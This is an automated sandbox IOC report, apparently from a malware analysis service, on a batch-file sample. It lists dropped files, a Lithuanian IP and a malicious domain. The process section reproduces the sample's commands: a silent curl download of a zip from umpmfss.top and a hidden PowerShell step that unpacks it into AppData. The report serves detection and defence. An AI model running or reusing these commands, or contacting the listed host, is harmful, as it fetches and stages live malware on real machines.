IOC Report
batch file malware.bat

FilesProcessesURLsDomainsIPsMemdumps21020102Label

Files

File Path
Type
Category
Malicious
Download
batch file malware.bat
DOS batch file, ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\count.zip
HTML document, ASCII text
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdy1a0js.m3a.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxt3qzyx.ud3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xl1i4x4w.iow.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zy4z3wuk.130.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\batch file malware.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\count.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\MyApp23' -Force"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -s -o "C:\Users\user\AppData\Roaming\count.zip" "https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c"

URLs

Name
IP
Malicious
https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cl
unknown
https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c23
unknown
https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cLOCALAPPDATA=C:
unknown
https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cZ3
unknown
https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c
77.83.199.142

Domains

Name
IP
Malicious
umpmfss.top
77.83.199.142

IPs

IP
Domain
Country
Malicious
77.83.199.142
umpmfss.top
Lithuania
127.0.0.1
unknown
unknown

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
25BD21AF000
heap
page read and write
25BD2290000
heap
page read and write
25BD21F5000
heap
page read and write
25BD21A3000
heap
page read and write
25BD2180000
remote allocation
page read and write
25BD21DA000
heap
page read and write
25BD21CC000
heap
page read and write
25BD22B0000
heap
page read and write
25BD220F000
heap
page read and write
25BD21F5000
heap
page read and write
25BD21B0000
heap
page read and write
25BD21CB000
heap
page read and write
25BD21DF000
heap
page read and write
25BD2190000
heap
page read and write
25BD21A9000
heap
page read and write
25BD21AA000
heap
page read and write
25BD220F000
heap
page read and write
25BD21AF000
heap
page read and write
25BD21DB000
heap
page read and write
25BD21A6000
heap
page read and write
25BD21DE000
heap
page read and write
25BD21CB000
heap
page read and write
25BD21AF000
heap
page read and write
25BD21AE000
heap
page read and write
25BD2404000
heap
page read and write
25BD20A0000
heap
page read and write
25BD21A1000
heap
page read and write
25BD2180000
remote allocation
page read and write
25BD220F000
heap
page read and write
25BD21E5000
heap
page read and write
25BD21DA000
heap
page read and write
7A1D2FC000
stack
page read and write
25BD2197000
heap
page read and write
25BD2400000
heap
page read and write
7A1D4FE000
stack
page read and write
25BD21AD000
heap
page read and write
25BD21CC000
heap
page read and write
25BD21B2000
heap
page read and write
25BD2180000
remote allocation
page read and write
7A1D3FF000
stack
page read and write
There are 30 hidden memdumps, click here to show them.